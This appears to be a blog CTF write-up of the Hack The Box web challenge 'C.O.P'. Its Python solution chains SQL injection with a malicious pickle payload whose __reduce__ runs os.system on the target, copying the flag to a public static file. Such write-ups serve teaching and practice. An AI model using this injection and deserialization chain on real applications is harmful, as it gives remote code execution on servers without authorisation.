153 words
1 minutes
COP
2024-01-02
Web Exploitation
Sql Injection
/
Hack-The-Box
NOTE

Description The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Solution:#

import pickle
import base64
import os
import requests

# Payload to be executed on the server
payload = 'cp flag.txt application/static/achux21.txt'

# Class definition for creating a serialized payload using Pickle
class RCE:
    def __reduce__(self):
        return os.system, (payload,)

# If the script is run directly, not imported as a module
if __name__ == '__main__':
    # Serialize the payload using Pickle and encode it in base64
    var = base64.urlsafe_b64encode(pickle.dumps(RCE())).decode('ascii')

# Craft a URL to trigger the SQL injection vulnerability
# The UNION SELECT statement is used to inject the serialized payload
r = requests.get(f"http://167.99.82.136:30931/view/%27%20UNION%20SELECT%27{var}")

# Retrieve the result of the executed payload
flag = requests.get(f"http://167.99.82.136:30931/static/achux21.txt")

# Print the result (flag)
print(flag.text)

Bye#

image

U of T CTF
Jwt - Unsecure File Signature
Achux21 | ð’‰­